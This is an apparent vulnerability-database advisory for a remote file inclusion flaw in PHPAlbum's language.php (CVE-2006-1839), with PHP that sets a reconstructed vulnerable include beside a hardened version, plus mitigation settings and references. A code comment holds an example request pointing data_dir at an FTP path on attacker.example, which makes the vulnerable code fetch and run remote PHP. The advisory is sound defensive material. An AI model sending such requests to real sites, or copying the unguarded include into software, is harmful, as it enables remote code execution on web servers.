PHPAlbum language.php Remote File Inclusion Vulnerability

Vulnerability ID: 1110072    Vulnerability type: Input validation
Published: 2006-04-15    Updated: 2008-11-05
CVE: CVE-2006-1839    CNNVD ID: CNNVD-200604-301
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/27643
https://www.securityfocus.com/bid/17526
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-301
|Vulnerability details
PHP remote file inclusion vulnerability in language.php in PHPAlbum 0.3.2.3, when register_globals is enabled, allows remote attackers to execute arbitrary code via an FTP URL in the data_dir parameter. The URL has to be an FTP URL because the include is guarded by a file_exists() call: PHP's ftp:// stream wrapper supports stat(), so file_exists() returns true for a reachable FTP path, whereas the http:// wrapper does not support stat() and would fail the check.
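The include pattern the advisory describes, beside a hardened version, as an added illustration that is not PHPAlbum's own code. The file name lang.php under data_dir, the request parameter name lang and both function names are assumptions made for the example.

```php
<?php
// Added illustration, not PHPAlbum's own code. It reconstructs the pattern
// the advisory describes and puts a hardened version beside it. The file
// name 'lang.php' under $data_dir and both function names are assumptions.

// ---------- Vulnerable pattern (hypothetical reconstruction) ----------
// Assumes register_globals=On: a request such as
//   language.php?data_dir=ftp://attacker.example/pub/
// creates $data_dir in global scope before any application code runs, so
// the script never has to read $_GET for the attacker's value to arrive.
function vulnerable_load_language($data_dir)
{
    // PHP's ftp:// stream wrapper supports stat(), so file_exists() returns
    // true for a reachable FTP path; the http:// wrapper does not support
    // stat(), which is why the advisory specifies an FTP URL.
    if (file_exists($data_dir . 'lang.php')) {
        // With allow_url_fopen=On (and, on PHP >= 5.2, allow_url_include=On)
        // this fetches and executes the attacker's file as PHP.
        include($data_dir . 'lang.php');
    }
}

// ---------- Hardened pattern ----------
// The data directory is fixed by the application; the client may only pick
// a short language code, which is validated before it touches a path.
function load_language_safe($lang_key)
{
    $base = realpath(__DIR__ . '/data/lang');
    if ($base === false) {
        return false;
    }
    // Whitelist: two lowercase letters, so no slashes, dots or URL schemes.
    if (!preg_match('/^[a-z]{2}$/', $lang_key)) {
        return false;
    }
    $file = realpath($base . '/' . $lang_key . '.php');
    // realpath() resolves '..' and symlinks and returns false for a missing
    // file; the prefix check rejects anything that resolves outside $base.
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $file;
    return true;
}

// Read the request value explicitly instead of relying on register_globals.
$lang = isset($_GET['lang']) ? (string) $_GET['lang'] : 'en';
if (!load_language_safe($lang)) {
    load_language_safe('en'); // fall back to the bundled default
}
```

The code fix alone is not the whole mitigation. register_globals should be Off (it was removed in PHP 5.4), and allow_url_fopen and, on PHP 5.2 or later, allow_url_include should be Off unless the application genuinely needs remote streams; with those settings the vulnerable function above cannot include a remote file even if an attacker controls $data_dir.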
|Exploit
source: http://www.securityfocus.com/bid/17526/info

phpAlbum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access. 

phpAlbum 0.3.2.3 and prior versions are affected.
|Affected products
phpAlbum.net phpalbum 0.3.2.3
phpAlbum.net phpalbum 0.2.3
phpAlbum.net phpalbum 4.1
|References

Source: BUGTRAQ
Name: 20060415 PHPAlbum <= 0.3.2.3 remote commnads execution
Link: http://www.securityfocus.com/archive/1/archive/1/431067/100/0/threaded
Source: VUPEN
Name: ADV-2006-1382
Link: http://www.frsirt.com/english/advisories/2006/1382
Source: SECUNIA
Name: 19661
Link: http://secunia.com/advisories/19661
Source: MISC
Link: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html
Source: XF
Name: phpalbum-language-file-include(25846)
Link: http://xforce.iss.net/xforce/xfdb/25846
Source: BID
Name: 17526
Link: http://www.securityfocus.com/bid/17526
Source: OSVDB
Name: 24741
Link: http://www.osvdb.org/24741